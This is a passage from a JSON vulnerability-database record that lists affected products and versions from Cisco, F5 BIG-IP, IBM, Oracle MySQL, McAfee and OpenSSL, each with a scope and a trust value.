routers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "openssh for gpfs for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "big-ip ltm hf10", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip apm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "project openssl 1.0.1f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip asm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.3" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.401" }, { "model": "project openssl 1.0.2a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.8" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.15" }, { "model": "bigfix remote control", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.1.3" }, { "model": "unity express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.7" }, { "model": "project openssl 1.0.2f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.21" }, { "model": "big-ip afm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.1" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "13000" }, { "model": "big-ip link controller hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip gtm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.1.1" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.4" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.0" }, { "model": "tandberg codian isdn gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email gateway 7.6.405h1165239", "scope": null, "trust": 0.3, "vendor": "mcafee", "version": null }, { "model": "jabber guest", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11" }, { "model": "big-ip asm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0.0" }, { "model": "big-ip aam hf9", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.9" }, { "model": "big-ip websafe", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0" }, { "model": "digital media manager 5.3.6 rb3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4.4.0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "series digital media players", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "44000" }, { "model": "big-ip asm hf8", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "ata series analog terminal adaptors", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1901.3" }, { "model": "prime network services controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ata series analog terminal adaptors", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1900" }, { "model": "asr series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "500021.2" }, { "model": "project openssl 1.0.1t", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-iq cloud hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.4" }, { "model": "ons series multiservice provisioning platforms", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1545410.7" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.12" }, { "model": "big-ip asm build", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.40.1.256" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.1" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "telepresence system series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.19" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.3" }, { "model": "worklight consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.2" }, { "model": "big-ip gtm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip apm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.4" }, { "model": "unified communications manager session management edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.19" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0" }, { "model": "big-ip ltm hf11", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "big-ip apm build", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.110.104.180" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.2" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.2" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.25" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.0" }, { "model": "big-ip aam build", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.01.14.628" }, { "model": "webex meetings server multimedia platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.7" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "unified ip conference phone 10.3.1sr4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8831" }, { "model": "prime network registrar", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.3.5" }, { "model": "big-ip analytics hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "project openssl 1.0.2d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "series stackable managed switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.2" }, { "model": "big-ip afm hf10", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "prime access registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified intelligent contact management enterprise", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.1" }, { "model": "stealthwatch flowcollector netflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3.2" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4.3.0" }, { "model": "ucs manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "big-ip edge gateway hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.11" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip gtm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.0" }, { "model": "network analysis module", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.2(2)" }, { "model": "big-ip apm hf6", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "big-ip gtm hf9", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "video surveillance 4300e and 4500e high-definition ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.3" }, { "model": "unified attendant console department edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ip series phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "78000" }, { "model": "aironet series access points", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "27000" }, { "model": "onepk all-in-one virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip link controller hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip ltm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "big-iq centralized management", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "5.1" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "big-ip pem hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.1" }, { "model": "big-iq cloud hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.4" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.6.0.1" }, { "model": "industrial router", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9100" }, { "model": "big-ip asm hf6", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "big-ip ltm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0.0" }, { "model": "big-ip asm hf11", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "big-ip asm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip asm hf9", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "unified intelligence center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip afm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.4" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "video distribution suite for internet streaming", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip ltm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.1" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "13006.1" }, { "model": "sdk for node.js", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.7.0.0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.7.1" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.116" }, { "model": "cloupia unified infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11006.1" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "packaged contact center enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "agent desktop for cisco unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "big-ip gtm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "big-ip pem hf8", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "adaptive security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.2" }, { "model": "telepresence sx series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.5" }, { "model": "big-ip dns", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.1.1" }, { "model": "big-ip apm hf8", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "big-ip afm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0.0" }, { "model": "project openssl 1.0.1n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.1" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.4" }, { "model": "nac appliance clean access server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "project openssl 1.0.1o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip asm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip apm hf6", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip aam hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "webex meetings for windows phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "80" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "sdk for node.js", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.4" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1.0.1" }, { "model": "big-ip ltm build 685-hf10", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.3" }, { "model": "big-ip analytics hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "spa232d multi-line dect analog telephone adapter", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.1" }, { "model": "prime optical for service providers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smart care", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4.6.0" }, { "model": "big-ip ltm hf6", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "big-ip ltm hf11", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip link controller hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "universal small cell cloudbase factory recovery root filesystem", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.99.4" }, { "model": "security network protection", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.11" }, { "model": "edge digital media player 1.2rb1.0.3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "340" }, { "model": "network performance analysis", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.1.1" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "60006.2.19" }, { "model": "big-ip asm hf6", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "unified ip conference phone for third-party call control", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "big-ip afm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0" }, { "model": "big-ip afm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "project openssl 1.0.2e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip link controller hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "big-ip afm hf10", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip aam hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0.0" }, { "model": "sonas", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.5.2.5" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.2.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "big-ip analytics build", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.40.1.256" }, { "model": "big-ip afm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.1" }, { "model": "project openssl 1.0.1q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "spectrum control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.10" }, { "model": "webex meetings for windows phone", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "82.8" }, { "model": "universal small cell cloudbase factory recovery root filesystem", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.7" }, { "model": "big-ip analytics hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0" }, { "model": "big-ip link controller hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.4" }, { "model": "secure access control system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.8.0.32.7" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.1.0" }, { "model": "telepresence integrator c series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "big-ip aam build", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.110.104.180" }, { "model": "tivoli provisioning manager for os deployment intirim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.133" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.3" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.9" }, { "model": "big-ip apm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "big-ip pem hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.4" }, { "model": "webex meetings client hosted", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.13" }, { "model": "big-ip ltm build", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.40.1.256" }, { "model": "content security management appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1.140" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.8" }, { "model": "big-ip aam hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "stealthwatch udp director", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "intrusion prevention system solutions", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.3" }, { "model": "big-iq centralized management", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.6" }, { "model": "unified ip conference phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "nexus series switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6000" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.1" }, { "model": "big-ip ltm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.3" }, { "model": "big-ip analytics hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.14" }, { "model": "big-ip analytics hf10", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.4" }, { "model": "big-ip ltm hf6", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip ltm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0.0" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "big-ip link controller hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "big-ip analytics build 685-hf10", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "jabber client framework components", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime ip express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified sip proxy software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.4" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "big-ip apm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.1" }, { "model": "big-ip websafe", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "big-ip pem hf10", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "mysql workbench", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.1.4" }, { "model": "big-ip link controller hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "security manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "netflow generation appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip afm hf8", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.403" }, { "model": "jabber for mac", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.4" }, { "model": "big-ip analytics hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.4" }, { "model": "unified sip proxy software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99510" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.3" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89450" }, { "model": "telepresence supervisor mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "80500" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20280.6" }, { "model": "telepresence server and mse", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "701087104.4" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.10" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.6" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.12" }, { "model": "ucs series and series fabric interconnects", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "620063000" }, { "model": "big-ip apm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2.2" }, { "model": "big-ip apm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "webex meeting center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.11" }, { "model": "big-ip aam hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.3" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.4" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.6.0.0" }, { "model": "big-ip gtm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.4" }, { "model": "big-ip analytics hf8", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.1.1" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.1.0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.1" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.1" }, { "model": "lotus protector for mail security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.8.3.0" }, { "model": "netflow generation appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.1(1)" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.8" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.13" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.2" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.6" 